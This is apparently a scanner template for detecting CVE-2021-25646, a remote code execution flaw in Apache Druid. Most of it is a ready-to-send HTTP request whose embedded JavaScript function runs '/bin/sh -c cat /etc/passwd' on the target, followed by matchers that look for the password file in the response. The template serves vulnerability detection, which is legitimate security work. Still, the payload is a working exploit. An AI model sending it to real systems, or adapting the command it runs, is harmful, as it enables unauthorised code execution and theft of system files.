81 lines
2.3 KiB
YAML
81 lines
2.3 KiB
YAML
id: CVE-2021-25646
|
|
|
|
info:
|
|
name: Apache Druid RCE
|
|
author: pikpikcu
|
|
severity: high
|
|
reference: https://paper.seebug.org/1476/
|
|
description: |
|
|
Apache Druid is a column-oriented open source distributed data storage written in Java, designed to quickly obtain large amounts of event data and provide low-latency queries on the data.
|
|
Apache Druid lacks authorization and authentication by default. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server.
|
|
tags: cve,cve2021,apache,rce,druid
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 8.80
|
|
cve-id: CVE-2021-25646
|
|
cwe-id: CWE-732
|
|
|
|
requests:
|
|
- raw:
|
|
- |
|
|
POST /druid/indexer/v1/sampler HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/json
|
|
|
|
{
|
|
"type":"index",
|
|
"spec":{
|
|
"ioConfig":{
|
|
"type":"index",
|
|
"firehose":{
|
|
"type":"local",
|
|
"baseDir":"/etc",
|
|
"filter":"passwd"
|
|
}
|
|
},
|
|
"dataSchema":{
|
|
"dataSource":"odgjxrrrePz",
|
|
"parser":{
|
|
"parseSpec":{
|
|
"format":"javascript",
|
|
"timestampSpec":{
|
|
|
|
},
|
|
"dimensionsSpec":{
|
|
|
|
},
|
|
"function":"function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\"/bin/sh`@~-c`@~cat /etc/passwd\".split(\"`@~\")).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:\"4137368\",OQtGXcxBVQVL: hTVCCerYZ}}",
|
|
"":{
|
|
"enabled":"true"
|
|
}
|
|
}
|
|
}
|
|
}
|
|
},
|
|
"samplerConfig":{
|
|
"numRows":10
|
|
}
|
|
}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: word
|
|
words:
|
|
- "application/json"
|
|
part: header
|
|
|
|
- type: word
|
|
words:
|
|
- "numRowsRead"
|
|
- "numRowsIndexed"
|
|
part: body
|
|
condition: and
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
part: body
|